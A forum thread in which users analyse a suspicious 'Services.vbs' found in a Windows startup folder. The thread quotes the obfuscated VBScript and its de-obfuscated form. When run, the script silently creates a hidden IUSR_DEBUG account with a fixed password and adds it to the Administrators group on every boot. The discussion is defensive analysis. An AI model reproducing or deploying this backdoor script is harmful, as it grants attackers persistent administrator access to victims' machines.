VBS expert interpret this script please.

Status
Not open for further replies.
Vigilante

Vigilante

Posts: 1,634   +0
I have the basic idea of what this is doing. But I'm wondering if someone can put this in plain English and tell me if it might be bad, or what it looks like to you.

The file is called "Services.vbs" and ended up in someone's startup, as in, the start menu startup. And it's not a shortcut, but the actual script is IN this startup folder.

Here is the code in the script:

Code: 
set wshshell=createobject ("wsc"&"ript.shell" ) 
a=wshshell.run ("cmd.exe /c n"&"et u"&"ser IUSR_D"&"EBUG zf,@"&"yjk515 /a"&"dd",0) 
b=wshshell.run ("cmd.exe /c n"&"et loca"&"lgroup Admin"&"istrators IUSR_"&"DEBUG /a"&"dd",0)

This might be a part of .NET framework, or perhaps a Microsoft Beta program, or their new "Express" programming tools. I don't know, but it appeared and I've got mixed feelings about it. What do you think?
 
The script adds user IUSR_DEBUG; then it ads the user to local Administrators group. You don't want to run this one for no reason, unless you know exactly what this acount is used for.
 
I did a google for "IUSR_DEBUG" and didn't turn up anything.

What's odd is why the script writer needs this to be in startup? Why would they want to add a user to admins on every boot? Wouldn't once be just as good?

However, I'm still thinking this was installed as part of some, perhaps debugging tool or program. But waiting to see if anybody else has run across this script before.

Also I find it strange that they mix in loads of "&" all over the place, which makes it more confusing to read. If it was legit, clear written code would have been better I think? Or is there a reason to split all the strings like that?
thx
 
You're right vigil,
this script smells like unrefrigrated fish.
set wshshell=createobject ("wsc"&"ript.shell" )
a=wshshell.run ("cmd.exe /c n"&"et u"&"ser IUSR_D"&"EBUG zf,@"&"yjk515 /a"&"dd",0)
b=wshshell.run ("cmd.exe /c n"&"et loca"&"lgroup Admin"&"istrators IUSR_"&"DEBUG /a"&"dd",0)
it translates to this:
set wshshell=createobject("wscript.shell")
a=wshshell.run("cmd.exe /c net user IUSR_DEBUG zf,@yjk515 /add,0)
b=wshehell.run("cmd.exe /c net localgroup Administrators IUSR_DEBUG /add,0)
(this script adds users to admin group, which is very dangerous).
 
Status
Not open for further replies.

Similar threads

T
Safari now has over 1 billion users, the second web browser to pass this milestone
Replies
22
Views
1K
GoldenGoat
GoldenGoat
N
Here's how you can disable VBS in Windows 11 for a performance boost
2
Replies
29
Views
5K
Freddellmeister
Freddellmeister
Shawn Knight
This Nintendo Switch accessory boosts screen size by 188 percent
Replies
2
Views
1K
nagynorbert97
N

Latest posts

Back